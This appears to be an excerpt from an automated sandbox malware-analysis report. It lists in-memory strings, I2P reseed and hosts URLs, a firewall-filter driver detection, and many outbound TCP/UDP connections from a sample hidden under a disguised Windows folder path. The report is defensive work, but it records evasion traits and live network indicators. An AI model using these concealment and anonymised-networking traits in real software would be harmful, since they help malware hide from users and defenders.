Source: main.exe, 00000020.00000002.3261726260.00000270D3CED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/*
Source: main.exe, 00000020.00000002.3261726260.00000270D3CED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/7
Source: main.exe, 00000020.00000002.3261726260.00000270D3CED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/&
Source: main.exe, 00000020.00000002.3262053344.00000270D3D82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/
Source: main.exe, 00000020.00000002.3262053344.00000270D3D82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/??
Source: main.exe, 00000020.00000002.3262053344.00000270D3D82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed.onion.im/
Source: main.exe, 00000020.00000002.3262201152.00000270D4100000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed.onion.im/i2pseeds.su3
Source: main.exe, 00000020.00000002.3263308068.00007FF8A8C54000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/
Source: update.pkg.11.drString found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/
NDIS Filter Driver detected (likely used to intercept and sniff network traffic)
Source: vc71izwl68ub3txurufnpr09g6ni3.exe.1.drStatic PE information: Found NDIS imports: FwpmEngineClose0, FwpmEngineOpen0, FwpmFilterAdd0, FwpmFilterDeleteByKey0, FwpmFreeMemory0, FwpmProviderAdd0, FwpmProviderCreateEnumHandle0, FwpmProviderDestroyEnumHandle0, FwpmProviderEnum0
Performs DNS queries to domains with low reputation
Source: DNS query: reseed-pl.i2pd.xyz
Uses TOR for connection hidding
Source: unknownDNS query: name: reseed.onion.im
Source: unknownNetwork traffic detected: IP country count 26
Source: global trafficTCP traffic: 192.168.2.5:49704 -> 45.200.148.158:1129
Source: global trafficTCP traffic: 192.168.2.5:49990 -> 31.3.152.100:32230
Source: global trafficTCP traffic: 192.168.2.5:49991 -> 148.135.95.231:16981
Source: global trafficTCP traffic: 192.168.2.5:49992 -> 78.191.208.199:13920
Source: global trafficTCP traffic: 192.168.2.5:49993 -> 193.233.193.76:4567
Source: global trafficTCP traffic: 192.168.2.5:49994 -> 107.189.28.6:12596
Source: global trafficTCP traffic: 192.168.2.5:49995 -> 118.136.159.58:13573
Source: global trafficTCP traffic: 192.168.2.5:49996 -> 174.164.200.204:22692
Source: global trafficTCP traffic: 192.168.2.5:49997 -> 145.220.60.21:23242
Source: global trafficTCP traffic: 192.168.2.5:49998 -> 139.59.231.96:11507
Source: global trafficTCP traffic: 192.168.2.5:49999 -> 194.54.156.174:1941
Source: global trafficTCP traffic: 192.168.2.5:50000 -> 176.241.49.148:14426
Source: global trafficTCP traffic: 192.168.2.5:50001 -> 78.57.19.55:11987
Source: global trafficTCP traffic: 192.168.2.5:50002 -> 23.137.249.66:9520
Source: global trafficTCP traffic: 192.168.2.5:50003 -> 95.158.36.98:30125
Source: global trafficTCP traffic: 192.168.2.5:50004 -> 120.77.100.135:9492
Source: global trafficTCP traffic: 192.168.2.5:50005 -> 188.174.152.142:9830
Source: global trafficTCP traffic: 192.168.2.5:50006 -> 95.105.66.5:4327
Source: global trafficTCP traffic: 192.168.2.5:50007 -> 69.10.220.235:19348
Source: global trafficUDP traffic: 192.168.2.5:29226 -> 73.110.171.77:10364
Source: global trafficUDP traffic: 192.168.2.5:29226 -> 36.37.69.163:9649
Source: global trafficUDP traffic: 192.168.2.5:29226 -> 82.65.181.52:25269
Source: global trafficUDP traffic: 192.168.2.5:29226 -> 185.148.3.164:20180
Source: global trafficUDP traffic: 192.168.2.5:29226 -> 49.176.22.233:23154
Source: global trafficUDP traffic: 192.168.2.5:29226 -> 87.209.87.178:23154
Source: global trafficUDP traffic: 192.168.2.5:29226 -> 92.39.210.213:27519
Source: global trafficUDP traffic: 192.168.2.5:29226 -> 213.108.251.66:14424
Source: global trafficUDP traffic: 192.168.2.5:29226 -> 47.221.95.89:23154
Source: global trafficUDP traffic: 192.168.2.5:29226 -> 24.125.49.216:10077
Source: global trafficUDP traffic: 192.168.2.5:29226 -> 57.128.196.4:14623
Source: global trafficUDP traffic: 192.168.2.5:29226 -> 208.113.128.162:4567
Source: global trafficUDP traffic: 192.168.2.5:29226 -> 123.215.14.113:21124
Source: global trafficUDP traffic: 192.168.2.5:29226 -> 155.93.133.82:23462
Source: global trafficUDP traffic: 192.168.2.5:29226 -> 67.2.9.136:29263
Source: global trafficUDP traffic: 192.168.2.5:29226 -> 71.246.18.247:33888
Source: global trafficUDP traffic: 192.168.2.5:29226 -> 198.74.48.115:28580
Source: global trafficUDP traffic: 192.168.2.5:29226 -> 24.57.10.130:23154
Source: global trafficUDP traffic: 192.168.2.5:29226 -> 179.254.168.215:28761
Source: global trafficUDP traffic: 192.168.2.5:29226 -> 65.109.174.146:28732
Source: global trafficUDP traffic: 192.168.2.5:29226 -> 2.155.132.51:15991
Source: global trafficUDP traffic: 192.168.2.5:29226 -> 128.140.43.40:15106
Source: global trafficUDP traffic: 192.168.2.5:29226 -> 77.238.244.54:18290
Source: global trafficUDP traffic: 192.168.2.5:29226 -> 144.76.102.56:37441
Source: global trafficUDP traffic: 192.168.2.5:29226 -> 46.142.175.43:34987
Source: global trafficUDP traffic: 192.168.2.5:29226 -> 101.191.73.121:14250
Source: global trafficUDP traffic: 192.168.2.5:29226 -> 31.10.150.55:28244
Source: global trafficUDP traffic: 192.168.2.5:29226 -> 178.175.134.3:29943
Source: global trafficUDP traffic: 192.168.2.5:29226 -> 147.79.71.139:19972
Source: global trafficUDP traffic: 192.168.2.5:29226 -> 45.83.104.162:57657
Source: global trafficUDP traffic: 192.168.2.5:29226 -> 84.52.93.26:15801
Source: global trafficUDP traffic: 192.168.2.5:29226 -> 50.37.113.212:20586
Source: global trafficUDP traffic: 192.168.2.5:29226 -> 108.61.189.74:30348
Source: global trafficUDP traffic: 192.168.2.5:29226 -> 78.58.40.197:22648
Source: global trafficUDP traffic: 192.168.2.5:29226 -> 120.24.253.140:9339
Source: global trafficUDP traffic: 192.168.2.5:29226 -> 72.11.42.34:30043
Source: Joe Sandbox ViewIP Address: 31.3.152.100 31.3.152.100
Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF8B9152A1A recv,WSAGetLastError,22_2_00007FF8B9152A1A
Source: global trafficHTTP traffic detected: GET https://reseed.memcpy.io:443/i2pseeds.su3 HTTP/1.0User-Agent: Wget/1.11.4Connection: close
Source: global trafficHTTP traffic detected: GET https://reseed-pl.i2pd.xyz:443/i2pseeds.su3 HTTP/1.0User-Agent: Wget/1.11.4Connection: close
Source: global trafficHTTP traffic detected: GET https://reseed-pl.i2pd.xyz:443/i2pseeds.su3 HTTP/1.0User-Agent: Wget/1.11.4Connection: close
Source: global trafficHTTP traffic detected: GET https://reseed.i2pgit.org:443/i2pseeds.su3 HTTP/1.0User-Agent: Wget/1.11.4Connection: close
Source: global trafficDNS traffic detected: DNS query: reseed.memcpy.io
Source: global trafficDNS traffic detected: DNS query: reseed-pl.i2pd.xyz
Source: global trafficDNS traffic detected: DNS query: reseed.i2pgit.org
Source: global trafficDNS traffic detected: DNS query: reseed.onion.im
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 05 Jan 2025 16:49:42 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-Encoding
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 05 Jan 2025 16:49:43 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-Encoding
Source: shdpeqdz2a54sj46ur0.exe, 0000000B.00000002.2510930956.00007FF76A97E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000016.00000003.2456738676.0000022350291000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000016.00000002.3155007370.000002234FE24000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000016.00000003.2456860774.0000022350297000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.22.dr, update.pkg.11.drString found in binary or memory: http://127.0.0.1:8118
Source: svchost.exe, 0000001F.00000003.3199473486.000001D37989B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3199443216.000001D37936E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3183985353.000001D379382000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3183713515.000001D379382000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/STS
Source: svchost.exe, 0000001F.00000003.3183713515.000001D379377000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3263271717.000001D37937C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/STS09/xmldsig#ripledes-cbcices/SOAPFaultcurity-utility-1.0.xsd
Source: svchost.exe, 0000001F.00000002.3263371493.000001D379800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3209006685.000001D379382000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3263092922.000001D379313000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/tb
Source: svchost.exe, 0000001F.00000002.3263426432.000001D379836000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3263588064.000001D37988F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/tb:pp
Source: svchost.exe, 0000001F.00000002.3263489218.000001D379854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/tb_
Source: svchost.exe, 0000001F.00000002.3262697506.000001D378AC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
Source: svchost.exe, 0000001F.00000002.3262697506.000001D378AC7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3037162349.000001D379352000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3263271717.000001D37937C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3143492582.000001D37937A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3111301830.000001D379307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3111317881.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3183985353.000001D37937C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3183713515.000001D37937C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3036974940.000001D379352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
Source: svchost.exe, 0000001F.00000003.3183261030.000001D379308000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd$
Source: svchost.exe, 0000001F.00000003.3143580946.000001D37930F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3143291121.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3156389621.000001D379307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3112272695.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3111493334.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3183931947.000001D37930F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3143546975.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3263042958.000001D379310000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3156417903.000001D37930F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3111460681.000001D37930F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3183773272.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3184036782.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3130778572.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3111301830.000001D379307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3111317881.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3183261030.000001D379308000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3183958551.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3184178913.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3143745371.000001D37930F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3199403669.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3112006865.000001D37930E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdAA
Source: svchost.exe, 0000001F.00000003.3130435099.000001D379329000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdAAAAAA
Source: svchost.exe, 0000001F.00000003.3183985353.000001D37937C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3183713515.000001D37937C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdes
Source: svchost.exe, 0000001F.00000003.3183985353.000001D37937C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3183713515.000001D37937C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsds
Source: svchost.exe, 0000001F.00000002.3263271717.000001D37937C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3143492582.000001D37937A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3111301830.000001D379307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3262754497.000001D378AD2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3111317881.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3183985353.000001D37937C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3183713515.000001D37937C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3036974940.000001D379352000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3199322434.000001D37930F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3183904232.000001D37930F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: svchost.exe, 0000001F.00000003.3156389621.000001D379307000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd$
Source: svchost.exe, 0000001F.00000003.3143580946.000001D37930F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3143291121.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3156389621.000001D379307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3112272695.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3111493334.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3183931947.000001D37930F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3143546975.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3263042958.000001D379310000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3156417903.000001D37930F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3111460681.000001D37930F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3183773272.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3184036782.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3130778572.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3111301830.000001D379307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3111317881.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3183261030.000001D379308000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3183958551.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3184178913.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3143745371.000001D37930F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3199403669.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3112006865.000001D37930E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdA
Source: svchost.exe, 0000001F.00000003.3130435099.000001D379329000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAAA
Source: svchost.exe, 0000001F.00000003.3130435099.000001D379329000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAAAA
Source: svchost.exe, 0000001F.00000003.3037162349.000001D379352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdmlns:
Source: svchost.exe, 0000001F.00000002.3263271717.000001D37937C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3143492582.000001D37937A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3183985353.000001D37937C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3183713515.000001D37937C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsds
Source: shdpeqdz2a54sj46ur0.exe, 0000000B.00000002.2510930956.00007FF76A97E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000016.00000002.3155007370.000002234FE24000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.22.dr, update.pkg.11.drString found in binary or memory: http://identiguy.i2p/hosts.txt
Source: svchost.exe, 0000001F.00000002.3262531893.000001D378A5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3263392705.000001D379813000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3263489218.000001D379854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://passport.net/tb
Source: update.pkg.11.drString found in binary or memory: http://reg.i2p/hosts.txt
Source: main.exe, 00000020.00000002.3261726260.00000270D3CED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://reg.i2p/hosts.txt9
Source: shdpeqdz2a54sj46ur0.exe, 0000000B.00000002.2510930956.00007FF76A97E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000016.00000002.3155007370.000002234FE24000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.22.dr, update.pkg.11.drString found in binary or memory: http://rus.i2p/hosts.txt
Source: svchost.exe, 0000001F.00000003.3111493334.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3111460681.000001D37930F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3112006865.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3111952207.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3111425069.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3263196941.000001D37935F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: svchost.exe, 0000001F.00000002.3263129207.000001D379337000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: svchost.exe, 0000001F.00000003.3121387179.000001D379366000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3263196941.000001D37935F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3199322434.000001D37930F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3183904232.000001D37930F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3263092922.000001D379313000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
Source: svchost.exe, 0000001F.00000003.3111366178.000001D37936E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3199377490.000001D37936D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3263235797.000001D37936F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3199443216.000001D37936E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3121387179.000001D379366000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policysrf
Source: svchost.exe, 0000001F.00000003.3121387179.000001D379366000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3263196941.000001D37935F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
Source: svchost.exe, 0000001F.00000002.3263092922.000001D379313000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/scn
Source: svchost.exe, 0000001F.00000002.3263196941.000001D37935F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3199322434.000001D37930F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3183904232.000001D37930F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3263092922.000001D379313000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
Source: svchost.exe, 0000001F.00000003.3199377490.000001D37936D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3263235797.000001D37936F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3199443216.000001D37936E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3121387179.000001D379366000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
